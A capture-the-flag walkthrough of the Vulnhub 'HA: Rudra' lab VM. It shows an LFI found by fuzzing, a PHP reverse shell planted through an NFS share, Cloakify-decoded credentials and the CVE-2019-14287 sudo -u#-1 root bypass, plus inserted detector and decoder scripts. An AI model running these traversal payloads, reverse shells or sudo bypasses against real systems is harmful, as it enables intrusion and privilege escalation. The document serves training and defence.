Vulnhub: Detailed Walkthrough of the Rudra Machine

Rudra

Author: jason huawen

Target Information

Name: HA: Rudra

URL:

https://www.vulnhub.com/entry/ha-rudra,386/

Identifying the Target Host's IP Address

┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# netdiscover -i eth1 -r 192.168.187.0/24         
Currently scanning: 192.168.187.0/24   |   Screen View: Unique Hosts                                             
                                                                                                                  
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                  
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.187.1   00:50:56:c0:00:01      1      60  VMware, Inc.                                                   
 192.168.187.143 00:0c:29:8d:a3:b1      1      60  VMware, Inc.                                                   
 192.168.187.254 00:50:56:e0:12:65      1      60  VMware, Inc.             

Using the netdiscover tool on Kali Linux, the target host's IP address is identified as 192.168.187.143.

NMAP Scan

┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# nmap -sS -sV -sC -p- 192.168.187.143 -oN nmap_full_scan                                                  130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-14 21:34 EDT
Nmap scan report for localhost (192.168.187.143)
Host is up (0.0014s latency).
Not shown: 65527 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 d7:0d:45:dd:52:69:f9:54:2a:73:a7:d0:c5:ab:db:9b (RSA)
|   256 7f:cc:3c:a5:53:47:05:15:94:95:41:ea:5e:48:f1:00 (ECDSA)
|_  256 30:da:01:de:ab:d8:19:1e:fc:58:44:22:3b:29:33:cd (ED25519)
80/tcp    open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-title: HA: Rudra
|_http-server-header: Apache/2.4.29 (Ubuntu)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      40314/udp   mountd
|   100005  1,2,3      44757/tcp6  mountd
|   100005  1,2,3      45803/tcp   mountd
|   100005  1,2,3      48685/udp6  mountd
|   100021  1,3,4      38241/tcp6  nlockmgr
|   100021  1,3,4      41413/tcp   nlockmgr
|   100021  1,3,4      42372/udp6  nlockmgr
|   100021  1,3,4      45582/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
33207/tcp open  mountd   1-3 (RPC #100005)
41413/tcp open  nlockmgr 1-4 (RPC #100021)
45803/tcp open  mountd   1-3 (RPC #100005)
48401/tcp open  mountd   1-3 (RPC #100005)
MAC Address: 00:0C:29:8D:A3:B1 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.74 seconds

The NMAP scan results show that the target host mainly runs ssh, http, and the NFS file-sharing service.

Getting a Shell

Start with the NFS file share:

┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# showmount -e 192.168.187.143
Export list for 192.168.187.143:
/home/shivay *
                                                                                                                   
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# mkdir share
                                                                                                                   
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# mount -t nfs 192.168.187.143:/home/shivay share
                                                                                                                   
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# cd share 
                                                                                                                   
┌──(root💀kali)-[~/Vulnhub/Ruda/share]
└─# ls
mahadev.txt
                                                                                                                   
┌──(root💀kali)-[~/Vulnhub/Ruda/share]
└─# cat mahadev.txt        
Rudra is another name of Lord Shiva. As per the vedic scriptures there are total 11 rudras. Of them, prominent one is Shiva. The other 10 rudras are considered as his expansions. As per Mahabharata, Srimad Bhagavatam and other vedic texts Lord Shiva appeared from Lord Brahma's eyebrows. Srimad Bhagvatam tells us why Lord Shiva is known as “Rudra”:

The purpose of the contents of mahadev.txt is not yet clear; could they be usernames, such as rudra or shiva?

┌──(root💀kali)-[~/Vulnhub/Ruda/share]
└─# curl http://192.168.187.143/robots.txt                                                                        
nandi.php
                                                                                                                   
┌──(root💀kali)-[~/Vulnhub/Ruda/share]
└─# curl http://192.168.187.143/nandi.php 
                                                

Requesting nandi.php returns an empty response (no error). Does it require a parameter? Set this aside for now, run a directory scan first, and then decide whether fuzzing is needed.

┌──(root💀kali)-[~/Vulnhub/Ruda/share]
└─# nikto -h http://192.168.187.143                        
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.187.143
+ Target Hostname:    192.168.187.143
+ Target Port:        80
+ Start Time:         2023-03-14 21:41:05 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 121f, size: 595769a7b3a80, mtime: gzip
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET 
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2023-03-14 21:42:17 (GMT-4) (72 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
                                                                                         

nikto did not give any more valuable information.

┌──(root💀kali)-[~/Vulnhub/Ruda/share]
└─# gobuster dir -u http://192.168.187.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.187.143
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html,js,sh,txt
[+] Timeout:                 10s
===============================================================
2023/03/14 21:43:03 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 4639]
/img                  (Status: 301) [Size: 316] [--> http://192.168.187.143/img/]
/assets               (Status: 301) [Size: 319] [--> http://192.168.187.143/assets/]
/robots.txt           (Status: 200) [Size: 10]                                      
/server-status        (Status: 403) [Size: 280]                                     
/detail2.html         (Status: 200) [Size: 3074]                                    
                                                                  

The directory scan turned up nothing useful. There is still the nandi.php file found earlier, so the next step is to fuzz it.

┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# wfuzz -u http://192.168.187.143/nandi.php?FUZZ=id -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.187.143/nandi.php?FUZZ=id
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                           
=====================================================================

┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# wfuzz -u http://192.168.187.143/nandi.php?FUZZ=../../../../../etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.187.143/nandi.php?FUZZ=../../../../../etc/passwd
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                           
=====================================================================

000000759:   200        30 L     39 W       1549 Ch     "file"  

The overall direction was right: the parameter name was successfully fuzzed as file. The first run, with the value id, produced no hits at all; only with a path the script can actually read (the traversal to /etc/passwd) did the parameter name file stand out from the rest.

┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# curl http://192.168.187.143/nandi.php?file=../../../../../etc/passwd                                     130 ⨯
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
rudra:x:1000:1000:rudra,,,:/home/rudra:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mahakaal:x:1001:1001:,,,:/home/mahakaal:/bin/bash
statd:x:107:65534::/var/lib/nfs:/usr/sbin/nologin
shivay:x:1002:1002:,,,:/home/shivay:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false

The usernames (besides root) are rudra, shivay and mahakaal, which confirms the earlier guess.

┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# curl http://192.168.187.143/nandi.php?file=../../../../../home/rudra/.ssh/id_rsa
                                                                                                                   
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# curl http://192.168.187.143/nandi.php?file=../../../../../home/shivay/.ssh/id_rsa
                                                                                                                   
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# curl http://192.168.187.143/nandi.php?file=../../../../../var/log/auth.log       
                                                                                                                   
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# curl http://192.168.187.143/nandi.php?file=../../../../../var/log/apache2/access.log
                                                                                            

Having found a local file inclusion vulnerability on the target, the natural next step is to check whether SSH private key files exist and whether log files can be read, but neither the SSH private keys nor the log files could be read. Next, check for a remote file inclusion vulnerability:

┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# curl http://192.168.187.143/nandi.php?file=http://192.168.187.130:8000/test.txt     

Testing shows there is no remote file inclusion vulnerability either.

However, the earlier enumeration showed that the target host exports an NFS share, so shell.php can be uploaded to the target through it, and the file inclusion vulnerability can then be used to get a shell.

┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# cp ~/Toolsets/php-reverse-shell-1.0/php-reverse-shell.php shell.php
                                                                                                                   
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# vim shell.php 
                                                                                                                   
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# cd share                                                           
                                                                                                                   
┌──(root💀kali)-[~/Vulnhub/Ruda/share]
└─# cp ../shell.php .

And we know the share's directory location on the target is:

/home/shivay

Next, use the local file inclusion vulnerability to include that file.

Note that the permissions of shell.php must be changed, otherwise execution fails.

┌──(root💀kali)-[~/Vulnhub/Ruda/share]
└─# chmod 777 shell.php        
┌──(root💀kali)-[~/Vulnhub/Ruda]
└─# nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.187.130] from (UNKNOWN) [192.168.187.143] 38318
Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 19:43:21 up  1:13,  0 users,  load average: 0.00, 0.03, 0.09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$ cd /home
cd /home
www-data@ubuntu:/home$ ls -alh
ls -alh
total 20K
drwxr-xr-x  5 root     root     4.0K Oct 21  2019 .
drwxr-xr-x 22 root     root     4.0K Oct 21  2019 ..
drwxr-xr-x  3 mahakaal mahakaal 4.0K Oct 21  2019 mahakaal
drwxr-xr-x  3 rudra    rudra    4.0K Oct 21  2019 rudra
drwxr-xr-x  2 shivay   shivay   4.0K Mar 14 19:37 shivay
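From the defender's side, the whole chain above (parameter fuzzing, traversal reads, the remote-inclusion attempt and the final include of shell.php) leaves a recognisable trace in the Apache access log. The following detector is an added example, not part of the original post: it parses constructed combined-format log lines modelled on those requests and flags traversal sequences and URL or wrapper values in query parameters.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed Apache combined-format lines modelled on the requests made against
# nandi.php in this walkthrough (not a real log from the machine).
SAMPLE_LOG = """\
192.168.187.130 - - [14/Mar/2023:21:45:01 -0400] "GET /nandi.php?file=../../../../../etc/passwd HTTP/1.1" 200 1549 "-" "curl/7.88.1"
192.168.187.130 - - [14/Mar/2023:21:45:02 -0400] "GET /nandi.php?file=..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1549 "-" "curl/7.88.1"
192.168.187.130 - - [14/Mar/2023:21:46:10 -0400] "GET /nandi.php?file=http://192.168.187.130:8000/test.txt HTTP/1.1" 200 0 "-" "curl/7.88.1"
192.168.187.130 - - [14/Mar/2023:21:47:00 -0400] "GET /nandi.php?file=../../../../../home/shivay/shell.php HTTP/1.1" 200 0 "-" "curl/7.88.1"
192.168.187.1 - - [14/Mar/2023:21:48:00 -0400] "GET /detail2.html HTTP/1.1" 200 3074 "-" "Mozilla/5.0"
192.168.187.1 - - [14/Mar/2023:21:48:01 -0400] "GET /nandi.php?file=about.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# Values that point outside the web root or at a remote/stream-wrapper resource.
WRAPPER_RE = re.compile(r'^(?:https?|ftps?|php|data|expect|phar|zip)://', re.IGNORECASE)
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')


def classify_value(value):
    """Label one query-parameter value, or return None when it looks harmless.
    Decoding twice catches double-encoded traversal such as %252e%252e%252f."""
    v = unquote(unquote(value))
    if TRAVERSAL_RE.search(v):
        return "lfi-traversal"
    if WRAPPER_RE.match(v):
        return "remote-or-wrapper-inclusion"
    return None


def scan_log(text):
    """Return one finding per suspicious parameter in each parsable request line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        url = urlsplit(m.group("target"))
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            label = classify_value(value)
            if label:
                findings.append({"ip": m.group("ip"), "path": url.path, "param": name,
                                 "value": value, "label": label,
                                 "status": int(m.group("status"))})
    return findings


def summarize(findings):
    """Count findings per (client IP, label): a quick triage view for an alert."""
    counts = {}
    for f in findings:
        key = (f["ip"], f["label"])
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['label']:<28} {f['path']}?{f['param']}={f['value']}")
    print(summarize(scan_log(SAMPLE_LOG)))
```

The benign about.html request is deliberately left unflagged: the detector keys on the value shape, not on the nandi.php path, so it does not alert on every legitimate use of the parameter.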

Privilege Escalation

Upload the linpeas.sh script to the target's /tmp directory, change its permissions, and run it. The output shows that the target is running mysql, so try logging in without a password:

www-data@ubuntu:/tmp$ mysql -uroot -p
mysql -uroot -p
Enter password: 

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 6
Server version: 5.7.27-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mahadev            |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

mysql> 

mysql> use mahadev;
use mahadev;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
show tables;
+-------------------+
| Tables_in_mahadev |
+-------------------+
| hint              |
+-------------------+
1 row in set (0.00 sec)

mysql> select * from hint;
select * from hint;
+---------------------------+
| hint                      |
+---------------------------+
| check on media filesystem |
+---------------------------+
1 row in set (0.00 sec)


www-data@ubuntu:/media$ cat hints
cat hints
https://www.hackingarticles.in/cloakify-factory-a-data-exfiltration-tool-uses-text-based-steganography/   

without noise
www-data@ubuntu:/media$ 

Cloakify Factory converts any file type (for example .zip, .exe or .xls) into a list of harmless-looking strings. This lets you hide a file in plain sight and transfer it without triggering alarms. The fancy term for this is "text-based steganography": hiding data by making it look like other data. Hiding the file this way can defeat signature-based malware detection tools.

www-data@ubuntu:/media$ cat creds
cat creds
😴
😬
😥
😭
🐼
😬
🙈
😕
🐼
😬
🐵
😊
😀
😻
😥
😓
🐼
😅
😕
😕
😀
🙊
😾
😕
😝
😛
🙎
🙎

┌──(root💀kali)-[~/Vulnhub/Ruda/Cloakify]
└─# python2 cloakifyFactory.py 
  ____ _             _    _  __        ______         _                   
 / __ \ |           | |  |_|/ _|       |  ___|       | |                  
| /  \/ | ___   __ _| | ___| |_ _   _  | |_ __ _  ___| |_ ___  _ __ _   _ 
| |   | |/ _ \ / _` | |/ / |  _| | | | |  _/ _` |/ __| __/ _ \| '__| | | |
| \__/\ | |_| | |_| |   <| | | | |_| | | || |_| | |__| || |_| | |  | |_| |
 \____/_|\___/ \__,_|_|\_\_|_|  \__, | \_| \__,_|\___|\__\___/|_|   \__, |
                                 __/ |                               __/ |
                                |___/                               |___/ 

             "Hide & Exfiltrate Any Filetype in Plain Sight"

                         Written by TryCatchHCF
                     https://github.com/TryCatchHCF
  (\~---.
  /   (\-`-/)
 (      ' '  )         data.xls image.jpg  \     List of emoji, IP addresses,
  \ (  \_Y_/\    ImADolphin.exe backup.zip  -->  sports teams, desserts,
   ""\ \___//         LoadMe.war file.doc  /     beers, anything you imagine
      `w   "

====  Cloakify Factory Main Menu  ====

1) Cloakify a File
2) Decloakify a File
3) Browse Ciphers
4) Browse Noise Generators
5) Help / Basic Usage
6) About Cloakify Factory
7) Exit

Selection: 2

====  Decloakify a Cloaked File  ====

Enter filename to decloakify (e.g. /foo/bar/MyBoringList.txt): /root/Vulnhub/Ruda/creds

Save decloaked data to filename (default: 'decloaked.file'): 

Preview cloaked file? (y/n default=n): 
Was noise added to the cloaked file? (y/n default=n): n

Ciphers:

1 - topWebsites
2 - geocache
3 - dessertsArabic
4 - dessertsRussian
5 - geoCoordsWorldCapitals
6 - dessertsHindi
7 - dessertsPersian
8 - dessertsThai
9 - hashesMD5
10 - dessertsChinese
11 - emoji
12 - statusCodes
13 - amphibians
14 - ipAddressesTop100
15 - desserts
16 - starTrek
17 - skiResorts
18 - dessertsSwedishChef
19 - rickrollYoutube
20 - worldBeaches
21 - belgianBeers
22 - pokemonGo
23 - evadeAV
24 - worldFootballTeams

Enter cipher #: 11

Decloaking file using cipher:  emoji

!!! Oh noes! Error decloaking file (did you select the same cipher it was cloaked with?)

Press return to continue...  

====  Cloakify Factory Main Menu  ====

1) Cloakify a File
2) Decloakify a File
3) Browse Ciphers
4) Browse Noise Generators
5) Help / Basic Usage
6) About Cloakify Factory
7) Exit

Selection: 2

====  Decloakify a Cloaked File  ====

Enter filename to decloakify (e.g. /foo/bar/MyBoringList.txt): /root/Vulnhub/Ruda/creds

Save decloaked data to filename (default: 'decloaked.file'): 

Preview cloaked file? (y/n default=n): 
Was noise added to the cloaked file? (y/n default=n): n

Ciphers:

1 - topWebsites
2 - geocache
3 - dessertsArabic
4 - dessertsRussian
5 - geoCoordsWorldCapitals
6 - dessertsHindi
7 - dessertsPersian
8 - dessertsThai
9 - hashesMD5
10 - dessertsChinese
11 - emoji
12 - statusCodes
13 - amphibians
14 - ipAddressesTop100
15 - desserts
16 - starTrek
17 - skiResorts
18 - dessertsSwedishChef
19 - rickrollYoutube
20 - worldBeaches
21 - belgianBeers
22 - pokemonGo
23 - evadeAV
24 - worldFootballTeams

Enter cipher #: 11

Decloaking file using cipher:  emoji

Decloaked file /root/Vulnhub/Ruda/creds , saved to decloaked.file
Press return to continue... 

====  Cloakify Factory Main Menu  ====

1) Cloakify a File
2) Decloakify a File
3) Browse Ciphers
4) Browse Noise Generators
5) Help / Basic Usage
6) About Cloakify Factory
7) Exit

Selection: 7

Hei hei!

                                                                                                                   
┌──(root💀kali)-[~/Vulnhub/Ruda/Cloakify]
└─# ls
ciphers             decloaked.file  LICENSE                     README_GETTING_STARTED.txt
cloakifyFactory.py  decloakify.py   listsUnrandomized           README.md
cloakify.py         decloakify.pyc  noiseTools                  removeNoise.py
cloakify.pyc        DefCon24Slides  randomizeCipherExample.txt  screenshots
                                                                                                                   
┌──(root💀kali)-[~/Vulnhub/Ruda/Cloakify]
└─# cat decloaked.file          
mahakaal:kalbhairav              

This yields the password of user mahakaal.
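As an added example (not from the original post, and not Cloakify's own code), here is the scheme in Python: base64 the data, then replace every base64 symbol with one line of a 65-entry cipher list. Because both the cloaked creds file and its decoded output are shown above, the 18 emoji-to-symbol pairs they pin down can be recovered as a known-plaintext exercise; the remaining 47 slots are filled with constructed placeholders, so the resulting list is not the tool's real emoji cipher, and a defender check for files that look cloaked is included.

```python
import base64
import string

# The 65-symbol base64 table (alphabet plus '=' padding) that Cloakify maps
# line-for-line onto a 65-entry cipher list such as its emoji list.
B64_SYMBOLS = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/="

# The 28-line creds file from /media on the machine (copied from the walkthrough)
# and the plaintext that Cloakify Factory recovered from it.
CREDS_FILE = ("😴\n😬\n😥\n😭\n🐼\n😬\n🙈\n😕\n🐼\n😬\n🐵\n😊\n😀\n😻\n"
              "😥\n😓\n🐼\n😅\n😕\n😕\n😀\n🙊\n😾\n😕\n😝\n😛\n🙎\n🙎\n")
CREDS_PLAINTEXT = b"mahakaal:kalbhairav"   # base64: bWFoYWthYWw6a2FsYmhhaXJhdg==


def _lines(text):
    return [line.strip() for line in text.splitlines() if line.strip()]


def recover_mapping(plaintext, cloaked_text):
    """Known-plaintext recovery: pair each base64 symbol of the plaintext with the
    cloaked line at the same position. Raises if the pairing is not a bijection."""
    symbols = base64.b64encode(plaintext).decode("ascii")
    lines = _lines(cloaked_text)
    if len(symbols) != len(lines):
        raise ValueError(f"{len(lines)} lines cannot encode {len(symbols)} base64 symbols")
    mapping = {}
    for sym, line in zip(symbols, lines):
        if mapping.setdefault(sym, line) != line:
            raise ValueError(f"symbol {sym!r} maps to two different lines")
    if len(set(mapping.values())) != len(mapping):
        raise ValueError("one cipher line stands for two different symbols")
    return mapping


def build_cipher(mapping):
    """65-entry cipher: recovered symbols keep their emoji, every other slot gets a
    constructed placeholder, so this is NOT the tool's complete emoji cipher."""
    cipher = [mapping.get(sym, chr(0x1F900 + i)) for i, sym in enumerate(B64_SYMBOLS)]
    if len(set(cipher)) != len(cipher):
        raise ValueError("cipher entries must be distinct")
    return cipher


def cloakify(data, cipher):
    """Base64-encode, then write each symbol's cipher entry on its own line."""
    encoded = base64.b64encode(data).decode("ascii")
    return "".join(cipher[B64_SYMBOLS.index(c)] + "\n" for c in encoded)


def decloakify(text, cipher):
    """Map each line back to its base64 symbol, then base64-decode."""
    index = {line: B64_SYMBOLS[i] for i, line in enumerate(cipher)}
    try:
        symbols = "".join(index[line] for line in _lines(text))
    except KeyError as e:
        raise ValueError(f"line {e.args[0]!r} is not in the selected cipher") from None
    return base64.b64decode(symbols, validate=True)


def looks_cloaked(text, cipher):
    """Defender check on a suspicious list file: every line is a cipher entry and
    the line count is a multiple of 4, as base64 output always is."""
    lines = _lines(text)
    known = set(cipher)
    return bool(lines) and len(lines) % 4 == 0 and all(line in known for line in lines)


if __name__ == "__main__":
    cipher = build_cipher(recover_mapping(CREDS_PLAINTEXT, CREDS_FILE))
    print(decloakify(CREDS_FILE, cipher), looks_cloaked(CREDS_FILE, cipher))
```

The 28-line length of the creds file is itself a consistency check: 28 base64 symbols with two trailing padding lines (the repeated final emoji) encode exactly 19 bytes, the length of mahakaal:kalbhairav.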

┌──(root💀kali)-[~/Vulnhub/Ruda/Cloakify]
└─# ssh mahakaal@192.168.187.143           
The authenticity of host '192.168.187.143 (192.168.187.143)' can't be established.
ED25519 key fingerprint is SHA256:UOdR8TkcYRUx1hMdAQ/6s+/UyLBxjbAnytjRoTUtjKk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.187.143' (ED25519) to the list of known hosts.
mahakaal@192.168.187.143's password: 
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Mon Oct 21 09:59:11 2019 from 192.168.1.107
mahakaal@ubuntu:~$ id
uid=1001(mahakaal) gid=1001(mahakaal) groups=1001(mahakaal)
mahakaal@ubuntu:~$ sudo -l
[sudo] password for mahakaal: 
Matching Defaults entries for mahakaal on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mahakaal may run the following commands on ubuntu:
    (ALL, !root) /usr/bin/watch

mahakaal@ubuntu:~$ sudo /usr/bin/watch  -x sh -c 'reset; exec sh 1>&0 2>&0'
Sorry, user mahakaal is not allowed to execute '/usr/bin/watch -x sh -c reset; exec sh 1>&0 2>&0' as root on ubuntu.
mahakaal@ubuntu:~$ ls /home
mahakaal  rudra  shivay
mahakaal@ubuntu:~$ sudo -u rudra /usr/bin/watch  -x sh -c 'reset; exec sh 1>&0 2>&0'
$ id
uid=1000(rudra) gid=1000(rudra) groups=1000(rudra),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare)
$ 

This is CVE-2019-14287: in sudo versions before 1.8.28, a runas specification that excludes root (such as (ALL, !root)) can be bypassed by requesting user id -1 with -u#-1, which sudo resolves to uid 0:

mahakaal@ubuntu:~$ sudo -l
Matching Defaults entries for mahakaal on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mahakaal may run the following commands on ubuntu:
    (ALL, !root) /usr/bin/watch
mahakaal@ubuntu:~$ sudo -u#-1 watch -x sh -c 'reset; exec sh 1>&0 2>&0' -u
# cd /root
# ls -alh
total 24K
drwx------  3 root root 4.0K Oct 21  2019 .
drwxr-xr-x 22 root root 4.0K Oct 21  2019 ..
-rw-r--r--  1 root root 3.1K Apr  9  2018 .bashrc
-rw-r--r--  1 root root 1.2K Oct 21  2019 final.txt
drwxr-xr-x  3 root root 4.0K Oct 21  2019 .local
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
# cat final.txt


     .           ]@&L           .
      Jw         #@&&         zM
      '|$w      ,]@&$L      ,$\r
       k|$L     ]]@$$$     ,@|j
       ]@!$     j]@&$$W    $|p[
        @@j$   ]j]N&$$@   $@@@
        $&@B~  jj]B&$$@   @@$@
        #R&&[  `]]@&$$*  ]$$@N
        j%%@$    "@&M    ]RN%k
        |" 7$     $&     ]F%"|
        (%'"$      $     $@%") 
         \%%$     *g@*   $%"/
            ''*]%r&& %h*'''
                'L@&=r
                 '@&U
                 j@&L
                 ]@&[
                 $@&K
                 $@&@
                 $$$@
       j@Hw.    -&&&&L    ,=m$~
       j@%%kkHr.       <[kkj]%r
       j@@gjjji||!;;!||jjjj%]%r
       j@Hkkj|||!=||~!l|jjjk%%r
       j@%%kisj|;!!*!;|!{{jj]%r
       j@@pkjb*` !#$#! `*jjkk]%r
       j[M"`     '&7!'     `*%$r
                 !%%!;
                 ;||!;
                 ;||!: 

!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
